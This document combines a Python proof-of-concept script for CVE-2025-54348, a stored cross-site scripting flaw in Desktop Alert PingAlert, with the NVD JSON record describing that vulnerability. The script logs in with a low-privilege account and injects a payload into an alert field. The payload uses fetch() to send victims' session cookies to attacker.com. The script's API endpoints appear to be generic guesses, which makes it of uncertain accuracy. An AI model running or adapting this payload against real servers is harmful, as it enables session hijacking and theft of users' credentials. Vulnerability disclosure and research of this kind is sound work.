CVE-2025-54348

import requests import json # CVE-2025-54348 PoC - Stored XSS in Desktop Alert PingAlert # Target: Desktop Alert PingAlert Application Server (v6.1.0.11 - v6.1.1.2) TARGET_URL = "http://target-server.com" # Replace with actual target LOGIN_URL = f"{TARGET_URL}/api/login" XSS_PAYLOAD_URL = f"{TARGET_URL}/api/pingalert/submit" # Malicious XSS payload that steals session cookies XSS_PAYLOAD = "<script>fetch('https://attacker.com/log?c='+document.cookie)</script>" def login(): """Authenticate with low-privilege account""" session = requests.Session() credentials = { "username": "attacker_user", "password": "password123" } response = session.post(LOGIN_URL, json=credentials) return session if response.status_code == 200 else None def inject_xss(session): """Inject stored XSS payload into ping alert field""" payload = { "alert_name": "Critical System Alert", "alert_message": XSS_PAYLOAD, "priority": "high" } response = session.post(XSS_PAYLOAD_URL, json=payload) return response.status_code == 200 def main(): print("[*] CVE-2025-54348 PoC - Desktop Alert PingAlert Stored XSS") session = login() if session: print("[+] Authentication successful") if inject_xss(session): print("[+] XSS payload injected successfully") print("[*] Wait for victim to access the alert page...") else: print("[-] Failed to inject payload") else: print("[-] Authentication failed") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-54348", "sourceIdentifier": "[email protected]", "published": "2025-11-14T18:15:49.063", "lastModified": "2025-11-20T14:54:53.907", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Stored Cross Site Scripting (XSS) vulnerability was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2 which allows an attacker to hijack user’s browser, capturing sensitive information."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:desktopalert:pingalert_application_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.0.11", "versionEndExcluding": "6.1.1.4", "matchCriteriaId": "3CE54623-DECB-4213-B299-40AAE561D3E2"}]}]}], "references": [{"url": "https://desktopalert.net", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://desktopalert.net/cve-2025-54348/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}